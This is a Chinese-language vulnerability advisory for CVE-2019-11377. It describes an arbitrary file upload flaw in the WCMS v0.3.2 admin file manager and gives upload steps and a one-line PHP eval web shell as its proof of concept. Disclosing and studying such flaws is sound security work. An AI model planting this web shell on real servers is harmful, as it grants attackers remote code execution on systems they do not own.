CVE中文申请站

一、漏洞摘要

漏洞名称: WCMS v0.3.2存在任意文件上传漏洞
上报日期: 2019-04-04
漏洞发现者: Yu Yang
产品首页: http://wcms.space/
软件链接: https://github.com/vedees/wcms
版本: v0.3.2
CVE编号: CVE-2019-11377


二、漏洞概述

在代码层上进行分析,发现该位置的上传功能,虽然建立有文件上传的白名单,但是并没有过滤掉充满风险的后缀(比如php)
1.png

三、利用方法

1.使用上传功能,在该CMS后台的 developer/finder模块
2.png
2.我们可以通过这个上传功能,上传任意后缀的文件到网站服务器上,这就导致攻击者可以上传恶意代码到服务器,以达到getshell的目的
3.png
POC(2.php):
<?php @eval($_POST[c]);?>
4.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/208/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11377
exploit-db:发布中

标签: 任意文件上传, WCMS